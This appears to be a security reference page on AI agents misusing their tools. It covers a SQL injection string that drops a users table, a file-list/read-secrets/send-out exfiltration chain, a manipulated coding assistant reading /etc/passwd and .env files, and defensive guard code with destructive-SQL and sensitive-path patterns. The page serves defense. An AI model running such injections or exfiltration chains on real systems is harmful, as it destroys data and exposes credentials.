Critical | protocol

Tool Misuse

Agents use their tools in unintended, harmful, or dangerous ways, either through manipulation or emergent behavior.

How to Detect

  • Tools invoked with unexpected parameters.
  • Excessive or unusual tool usage patterns.
  • Tools used to access resources outside task scope.
  • Chained tool calls that circumvent restrictions.

Root Causes

  • Overly permissive tool access.
  • Missing parameter validation.
  • No tool call auditing.
  • Agents given tools beyond task requirements.
  • Inadequate tool documentation for agents.


Deep Dive

Overview

Tool misuse (OWASP ASI02) occurs when agents invoke tools in ways that were not intended by system designers. This can result from direct attacks, emergent behavior, or subtle manipulation that exploits the gap between tool capabilities and agent understanding.

Categories of Tool Misuse

Direct Misuse

The agent uses a tool for a purpose it was not designed for:

# Intended: Send notification emails
# Misuse: Mass spam campaign
email_tool.send(
    to=all_users,  # Not just relevant user
    subject="URGENT: Click this link",
    body=malicious_content
)

Parameter Injection

Manipulating tool parameters to achieve unintended effects:

# Intended: Query a specific record through a parameterized query
database.query("SELECT * FROM users WHERE id = ?", user_id)

# Manipulated: the parameterized form is replaced by raw text that dumps, then drops, the table
database.query("SELECT * FROM users; DROP TABLE users; --")

Chained Tool Attacks

Combining legitimate tool calls to achieve illegitimate goals:

1. list_files("*") → Discover sensitive files
2. read_file("secrets.env") → Extract credentials
3. http_request(external_server, data=secrets) → Exfiltrate

Emergent Misuse

Agent discovers unintended tool capabilities through exploration:

Agent realizes file_write() + code_execute() can be combined
to create and run arbitrary code, bypassing code restrictions.

Tool Categories at Risk

High-Risk Tools

  • Code Execution: Can run arbitrary code
  • Network Access: Can exfiltrate data or attack external systems
  • Database Access: Can read, modify, or delete data
  • File System: Can access or modify sensitive files
  • Messaging: Can communicate externally

Medium-Risk Tools

  • Search/Query: Can access sensitive information
  • User Management: Can escalate privileges
  • Configuration: Can modify system behavior

Defense Strategies

Tool Allowlisting

ALLOWED_TOOLS = {
    "search": SearchTool(max_results=10),
    "calculate": CalculatorTool(),
    # No file system or network tools
}

Parameter Validation

class ToolMisuseError(Exception):
    """Raised when a tool call violates policy."""

SPAM_INDICATORS = {"click this link", "urgent"}  # illustrative phrases, tune per deployment

def validate_email_params(to, subject, body):
    # `to` is the list of recipient addresses: one recipient per call, no bulk sends
    if len(to) > 1:
        raise ToolMisuseError("Bulk email not permitted")
    if any(word in body.lower() for word in SPAM_INDICATORS):
        raise ToolMisuseError("Potentially harmful content")

Tool Call Auditing

@audit_tool_call                        # framework decorator assumed to record the call and its outcome
def execute_query(query):
    log_tool_usage("database", query)   # write to the audit trail before anything runs
    if is_destructive_query(query):     # e.g. DROP/DELETE/TRUNCATE or stacked statements
        require_human_approval()        # blocks until a reviewer accepts or rejects the call
    return database.execute(query)
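
As an added example, not code from the original page, the three defenses above combined with the chained-call detection described under How to Detect: an allowlist, per-tool parameter checks, a human-approval hook for destructive SQL, and a history check that blocks an outbound call once a sensitive file has been read. The tool names, the path and SQL patterns, and the `approve` hook are assumptions made for this example.

```python
import re
from dataclasses import dataclass, field
from typing import Callable, Optional

class ToolMisuseError(Exception):
    """Raised when a tool call violates policy (name constructed for this example)."""

# Illustrative policy values for this example, not from any real deployment.
SENSITIVE_PATH = re.compile(r"(^|/)(\.env|secrets\.env|passwd)$")
DESTRUCTIVE_SQL = re.compile(r"\b(drop|delete|truncate|alter)\b|;", re.IGNORECASE)
OUTBOUND_TOOLS = {"http_request", "send_email"}  # tools that can move data off-host

@dataclass
class ToolCallGuard:
    """Allowlist, per-tool parameter checks, chained-call detection and an audit log."""
    allowed: set
    approve: Callable[[tuple], bool] = lambda call: False  # human-in-the-loop hook; denies by default
    history: list = field(default_factory=list)           # calls that were allowed, in order
    audit_log: list = field(default_factory=list)         # every attempt, allowed or not

    def check(self, tool: str, **params) -> bool:
        self.audit_log.append((tool, dict(params)))
        if tool not in self.allowed:
            raise ToolMisuseError(f"{tool}: not in allowlist")
        # Parameter validation: `to` is a list of addresses, one per call; raw SQL with
        # a destructive keyword or stacked statements needs a human decision
        if tool == "send_email" and len(params.get("to", [])) > 1:
            raise ToolMisuseError("send_email: bulk email not permitted")
        if tool == "query" and DESTRUCTIVE_SQL.search(params.get("sql", "")):
            if not self.approve((tool, params)):
                raise ToolMisuseError("query: destructive statement requires human approval")
        # Chain detection: a sensitive file read followed by an outbound call is the exfiltration pattern
        if tool in OUTBOUND_TOOLS and self._read_sensitive_file():
            raise ToolMisuseError(f"{tool}: outbound call after sensitive file read")
        self.history.append((tool, dict(params)))
        return True

    def verdict(self, tool: str, **params) -> Optional[str]:
        """None if the call is allowed, otherwise the rejection reason."""
        try:
            self.check(tool, **params)
            return None
        except ToolMisuseError as exc:
            return str(exc)

    def _read_sensitive_file(self) -> bool:
        return any(t == "read_file" and SENSITIVE_PATH.search(p.get("path", ""))
                   for t, p in self.history)
```

The audit log records rejected attempts as well as allowed calls, which is what the anomaly monitoring under How to Prevent needs to see.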

How to Prevent

Principle of Least Privilege: Only provide tools strictly necessary for the task.

Strict Parameter Validation: Validate all tool parameters against expected ranges and patterns.

Tool Call Rate Limiting: Limit frequency and volume of sensitive tool calls.

Human-in-the-Loop: Require approval for high-risk tool operations.

Tool Call Auditing: Log and monitor all tool invocations for anomalies.

Sandboxed Execution: Run tool calls in isolated environments when possible.

Tool Capability Documentation: Clearly document intended uses to guide agent behavior.


Real-World Examples

An AI coding assistant with file system access was manipulated into reading /etc/passwd and .env files through a "debugging help" request, exposing system credentials and API keys to the attacker.